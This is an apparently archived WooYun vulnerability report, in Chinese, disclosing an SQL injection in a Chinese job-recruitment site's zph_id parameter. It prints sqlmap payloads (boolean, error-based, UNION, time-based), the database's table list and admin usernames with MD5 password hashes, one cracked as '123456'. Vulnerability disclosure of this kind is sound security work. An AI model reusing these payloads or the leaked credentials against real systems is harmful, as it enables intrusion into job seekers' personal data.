当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142181

漏洞标题:华职人才网存在注入漏洞#泄露大量重要信息(已进入网站后台)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-24 00:01

修复时间:2015-11-12 15:20

公开时间:2015-11-12 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开

简要描述:

华职人才网存在注入漏洞#泄露大量重要信息(已进入网站后台)。。。

详细说明:

注入点:http://**.**.**.**/other/zhanwei.php?zph_id=59
网站存在注入漏洞,泄露网站大量重要信息,包括 会员信息,个人简历信息,申请表等 已经获得网站管理员账号和密码 成功进入后台,不过admin的密码解不开。。。。
会员总数 21000(待审6391)
个人会员 15031(待审3860)
简历总计 15449(待审451)
企业会员 5969(待审2531)
职位总计 12604(待审891)
sqlmap identified the following injection points with a total of 0 HTTP(s)
reque
sts:
---
Place: GET
Parameter: zph_id
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: zph_id=-6146) OR (1921=1921)#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: zph_id=59) AND (SELECT 9413 FROM(SELECT COUNT(*),CONCAT
(0x3a667a6b3
a,(SELECT (CASE WHEN (9413=9413) THEN 1 ELSE 0 END)),0x3a7576663a,FLOOR
(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9427=9427
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: zph_id=59) UNION ALL SELECT CONCAT
(0x3a667a6b3a,0x706e61706e5742494
876,0x3a7576663a)#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: zph_id=59) AND 3690=BENCHMARK(5000000,MD5(0x69517a64)) AND
(1173=11
73
---
[10:49:07] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
[10:49:07] [INFO] fetching database names
[10:49:07] [WARNING] the SQL query provided does not return any output
[10:49:07] [INFO] the SQL query used returns 2 entries
[10:49:07] [INFO] resumed: information_schema
[10:49:07] [INFO] resumed: fjhzrc6
available databases [2]:
[*] fjhzrc6
[*] information_schema
[10:49:32] [INFO] resumed: 'fjhzrc6'@'localhost'
database management system users [1]:
[*] 'fjhzrc6'@'localhost'
current user: 'fjhzrc6@localhost'
current database: 'fjhzrc6'
[10:49:07] [INFO] resumed: information_schema
[10:49:07] [INFO] resumed: fjhzrc6
available databases [2]:
[*] fjhzrc6
[*] information_schema
Database: fjhzrc6
[89 tables]
+---------------------+
| cms_myexpert |
| cms_rbrower |
| cms_users |
| cms_xianchang |
| cms_yuding |
| cms_zhanwei |
| cms_zhaoph |
| job_ad |
| job_admin |
| job_adplace |
| job_adsplace |
| job_announce |
| job_browsed_resume |
| job_card |
| job_channel |
| job_comment |
| job_common |
| job_consume |
| job_count |
| job_countnum |
| job_course |
| job_coursetype |
| job_department |
| job_dept |
| job_ecoclass |
| job_edu |
| job_education |
| job_foreigndegree |
| job_foreignlanguage |
| job_group |
| job_guestbook |
| job_help |
| job_helpsort |
| job_hire |
| job_hrzp |
| job_interview |
| job_label |
| job_lang |
| job_letter |
| job_level |
| job_links |
| job_location |
| job_mail |
| job_mailtemp |
| job_manage_log |
| job_marriage |
| job_member |
| job_myexpert |
| job_myfavorite |
| job_myinterview |
| job_myreceive |
| job_mysend |
| job_nation |
| job_news |
| job_newssort |
| job_orderservice |
| job_payback |
| job_payonline |
| job_picture |
| job_polity |
| job_position |
| job_prices |
| job_profession |
| job_professor |
| job_provinceandcity |
| job_rbrower |
| job_recycle |
| job_reply |
| job_require |
| job_resume |
| job_resume_entering |
| job_rule_news |
| job_rule_office |
| job_save_url |
| job_sendresume |
| job_service_log |
| job_signup |
| job_site |
| job_siteconfig |
| job_sms |
| job_smstemp |
| job_student |
| job_trade |
| job_trainer |
| job_training |
| job_vhire |
| job_vote |
| job_work |
| job_zph |
+---------------------+
job_consume | 426971 |
会员总数 21000(待审6391)
个人会员 15031(待审3860)
简历总计 15449(待审451)
企业会员 5969(待审2531)
职位总计 12604(待审891)

1.png


3.png


4.png


5.png


6.jpg


7.png


漏洞证明:

Database: fjhzrc6
Table: job_admin
[12 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| a_flag   | varchar(3000)    |
| a_flags  | varchar(20)      |
| a_id     | int(10) unsigned |
| a_kf     | tinyint(1)       |
| a_mobile | varchar(15)      |
| a_name   | varchar(20)      |
| a_pass   | varchar(32)      |
| a_qq     | varchar(12)      |
| a_site   | smallint(4)      |
| a_tel    | varchar(20)      |
| a_type   | varchar(20)      |
| a_user   | varchar(20)      |
+----------+------------------+
Database: fjhzrc6
Table: job_admin
[2 entries]
+-------------------------------------------+---------+--------+
| a_pass                                    | a_name  | a_user |
+-------------------------------------------+---------+--------+
| e10adc3949ba59abbe56e057f20f883e (123456) | <blank> | winner |
| 6ba9f8d3667323bfbd20e76dff60f15c          | ???     | admin  |
+-------------------------------------------+---------+--------+


8.png


77.png


9.jpg


还有弱口令,醉了。。。。

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-28 15:19

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置。

最新状态:

暂无